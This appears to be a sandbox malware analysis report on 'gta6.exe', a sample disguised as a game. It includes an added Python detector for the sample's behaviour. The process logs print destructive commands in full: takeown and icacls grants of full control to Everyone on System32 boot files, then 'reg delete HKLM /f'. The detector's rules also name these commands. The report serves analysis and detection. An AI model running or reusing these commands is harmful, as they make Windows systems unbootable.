Windows Analysis Report
gta6.exe

Overview

General Information

Sample name: gta6.exe
Analysis ID: 1544786
MD5: aaff8d22681e8bdee3c3ba55007f673f
SHA1: aa94b52ee5290629165387bb0e7bdf3600e7a073
SHA256: 512b5deba1f1990f43876c48e0d8767f102cb7a0a949c6c9c6e079676bcd72eb
Tags: exe, user-MDMCk10
Infos:

Detection

UACMe
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected UACMe UAC Bypass tool
AI detected suspicious sample
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Recursive Takeown
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Name: UACMe
Description: A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

AV Detection

Source: gta6.exe Avira: detected
Source: gta6.exe ReversingLabs: Detection: 36%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.4% probability
Source: gta6.exe Joe Sandbox ML: detected

Exploits

Source: Yara match File source: Process Memory Space: reg.exe PID: 6384, type: MEMORYSTR
Source: Binary string: AcroExch.PDBookmark]bS source: reg.exe, 00000020.00000003.1441099460.0000024D35084000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.tmp
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user~1\
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user\AppData\Local\Temp\278F.tmp
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user~1\AppData\
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000B64C NtdllDefWindowProc_W,GetWindowLongPtrW,GetWindowTextLengthW,RtlAllocateHeap,GetWindowTextW,EnableWindow,DestroyWindow,UnregisterClassW, 0_2_000000014000B64C
Source: C:\Windows\System32\cmd.exe File deleted: C:\Windows\System32\drivers\DriverData
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014001F888 0_2_000000014001F888
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_00000001400138E5 0_2_00000001400138E5
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_00000001400154F0 0_2_00000001400154F0
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140015160 0_2_0000000140015160
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140015170 0_2_0000000140015170
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140013175 0_2_0000000140013175
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140010210 0_2_0000000140010210
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140016210 0_2_0000000140016210
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000EA48 0_2_000000014000EA48
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014001366E 0_2_000000014001366E
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000B758 0_2_000000014000B758
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140012FDD 0_2_0000000140012FDD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete HKLM /f
Source: reg.exe, 00000020.00000003.1441099460.0000024D35084000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .vbprojCx
Source: classification engine Classification label: mal72.expl.winEXE@46/2@0/0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Users\user\Desktop\gta6.exe File created: C:\Users\user\AppData\Local\Temp\278F.tmp
Source: C:\Users\user\Desktop\gta6.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"
Source: C:\Users\user\Desktop\gta6.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\gta6.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\gta6.exe "C:\Users\user\Desktop\gta6.exe"
Source: C:\Users\user\Desktop\gta6.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete HKLM /f
Source: C:\Users\user\Desktop\gta6.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete HKLM /f
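The process tree above is the whole payload: the UPX-packed gta6.exe drops a batch file to %TEMP%, and cmd.exe then runs takeown /f ... /r /d y followed by icacls ... /grant everyone:F /t against boot-critical System32 binaries (hal.dll, winload.exe, ntoskrnl.exe, winlogon.exe, consent.exe, the drivers directory) and finishes with reg delete HKLM /f. Note that the UACMe classification rests on a Yara hit in reg.exe's process memory; nothing in the observed behaviour is a UAC bypass, and takeown/icacls on those paths only succeed when the sample is already running elevated. The detection logic below is an added example written for this report, not Joe Sandbox's signature code and not part of the sample. It runs over constructed process-creation events (PIDs are made up; the command lines are modelled on the report's "Process created" lines) in the shape of Sysmon EventID 1 / Security 4688 fields. It assumes the core condition of the Sigma rule "Suspicious Recursive Takeown" is takeown.exe with both /f and /r, and the list of protected path prefixes is this example's own choice.

```python
"""Flag the takeown -> icacls -> reg delete chain from process-creation events.

Added example for this report; not Joe Sandbox code and not part of the sample.
Events are constructed (Sysmon EventID 1 / 4688-like fields); PIDs are made up.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Prefixes whose ownership/ACL changes count as tampering with the OS itself
# (this example's own list, not from the report).
PROTECTED_PREFIXES = (r"c:\windows\system32", r"c:\windows\syswow64")
ROOT_HIVES = {"hklm", "hkcu", "hkcr", "hku", "hkcc", "hkey_local_machine",
              "hkey_current_user", "hkey_classes_root", "hkey_users",
              "hkey_current_config"}
EVERYONE = {"everyone", "*s-1-1-0"}  # group name or its well-known SID


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def tokenize(cmdline: str):
    """Split a Windows command line on whitespace, keeping double-quoted runs whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def is_protected(path: str) -> bool:
    p = path.lower().rstrip("\\")
    return any(p == pre or p.startswith(pre + "\\") for pre in PROTECTED_PREFIXES)


def classify_event(ev: ProcEvent):
    """Return (tags, target) for one event; empty tags means nothing of interest."""
    name = ev.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    toks = tokenize(ev.cmdline)
    low = [t.lower() for t in toks]
    flags = {t for t in low[1:] if t.startswith("/")}
    tags, target = set(), None
    if name == "takeown.exe" and "/f" in flags:
        i = low.index("/f")
        target = toks[i + 1] if i + 1 < len(toks) else None
        if "/r" in flags:  # assumed core condition of the Sigma recursive-takeown rule
            tags.add("recursive_takeown")
        if target and is_protected(target):
            tags.add("takeown_protected_path")
    elif name == "icacls.exe" and len(toks) > 1:
        target = toks[1]
        for i, t in enumerate(low):
            if t in ("/grant", "/grant:r") and i + 1 < len(low):
                principal, _, perm = low[i + 1].partition(":")
                if principal in EVERYONE and perm.strip("()").startswith("f"):
                    tags.add("icacls_everyone_full")
        if is_protected(target):
            tags.add("icacls_protected_path")
    elif name == "reg.exe" and len(low) >= 3 and low[1] == "delete":
        target = toks[2]
        if low[2] in ROOT_HIVES and "/f" in flags:  # bare root hive, forced
            tags.add("reg_delete_root_hive")
    return tags, target


def correlate(events):
    """Group children by parent PID (the cmd.exe running the batch) and score each group."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev.ppid].append(ev)
    findings = {}
    for ppid, evs in by_parent.items():
        tags, targets = set(), set()
        for ev in evs:
            t, target = classify_event(ev)
            tags |= t
            if t and target:
                targets.add(target)
        if not tags:
            continue
        # Ownership seized AND ACL opened to Everyone on an OS path, or a forced delete
        # of a root hive, is the destructive chain; a lone recursive takeown is only the
        # Sigma-level hit.
        if "reg_delete_root_hive" in tags or (
                "takeown_protected_path" in tags and "icacls_everyone_full" in tags):
            severity = "critical"
        elif tags & {"recursive_takeown", "icacls_everyone_full"}:
            severity = "medium"
        else:
            severity = "low"
        findings[ppid] = {"severity": severity, "tags": tags, "targets": sorted(targets)}
    return findings


# Constructed events modelled on the report's process tree (PIDs are made up).
SAMPLE_EVENTS = [
    ProcEvent(5000, 4000, r"C:\Users\user\Desktop\gta6.exe", r'"C:\Users\user\Desktop\gta6.exe"'),
    ProcEvent(5001, 5000, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"'),
    ProcEvent(5002, 5001, r"C:\Windows\System32\fsutil.exe", "fsutil dirty query C:"),
    ProcEvent(5003, 5001, r"C:\Windows\System32\takeown.exe", r"takeown /f C:\Windows\System32\hal.dll /r /d y"),
    ProcEvent(5004, 5001, r"C:\Windows\System32\icacls.exe", r"icacls C:\Windows\System32\hal.dll /grant everyone:F /t"),
    ProcEvent(5005, 5001, r"C:\Windows\System32\takeown.exe", r"takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y"),
    ProcEvent(5006, 5001, r"C:\Windows\System32\icacls.exe", r"icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t"),
    ProcEvent(5007, 5001, r"C:\Windows\System32\icacls.exe", r"icacls C:\Windows\System32\drivers /grant everyone:F /t"),
    ProcEvent(5008, 5001, r"C:\Windows\System32\reg.exe", "reg delete HKLM /f"),
    # Benign admin session under another cmd.exe: a user file, no /r, no Everyone grant.
    ProcEvent(6001, 6000, r"C:\Windows\System32\takeown.exe", r"takeown /f C:\Users\user\Documents\old.txt"),
    ProcEvent(6002, 6000, r"C:\Windows\System32\icacls.exe", r"icacls C:\Users\user\Documents\old.txt /grant user:F"),
]

if __name__ == "__main__":
    for ppid, f in correlate(SAMPLE_EVENTS).items():
        print(f"parent {ppid}: {f['severity']} {sorted(f['tags'])} targets={f['targets']}")
```

Correlating by parent PID is what separates this from the single-event Sigma hit: one takeown /r by an administrator is noise, but takeown plus an Everyone:F grant on System32 paths plus a forced root-hive delete from the same cmd.exe is the chain in this report. Feed it real Sysmon or 4688 records by mapping ProcessId, ParentProcessId, Image and CommandLine onto ProcEvent.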
Source: C:\Users\user\Desktop\gta6.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\gta6.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\takeown.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\gta6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: gta6.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary, 0_2_000000014000D9C4
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014001BD3E push rbx; ret 0_2_000000014001BD3F
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: C:\Users\user\Desktop\gta6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gta6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\gta6.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\icacls.exe File opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\regedit.exe
Source: C:\Windows\System32\icacls.exe File opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\
Source: C:\Windows\System32\icacls.exe File opened / queried: C:\Windows\System32\drivers\vmci.sys
Source: C:\Windows\System32\takeown.exe File opened / queried: C:\Windows\System32\drivers\vmci.sys\
Source: C:\Users\user\Desktop\gta6.exe Window / User API: threadDelayed 982
Source: C:\Users\user\Desktop\gta6.exe TID: 820 Thread sleep count: 982 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: reg.exe, 00000020.00000003.1600455731.0000024D350C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count 
Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: reg.exe, 00000020.00000003.1612618239.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616503260.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1641852190.0000024D350CF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594439512.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1597565960.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607595828.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598748911.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599138962.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599859371.0000024D350C9000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598120945.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601887206.0000024D350D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition
Source: reg.exe, 00000020.00000003.1600387159.0000024D35802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other 
Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Resets/sec5084Page Table Validations/sec5086APIC TPR Accesses/sec5088Page Table Write Intercepts/sec5090Synthetic Interrupts/sec5092Virtual Interrupts/sec5094APIC IPIs Sent/sec5096APIC Self IPIs
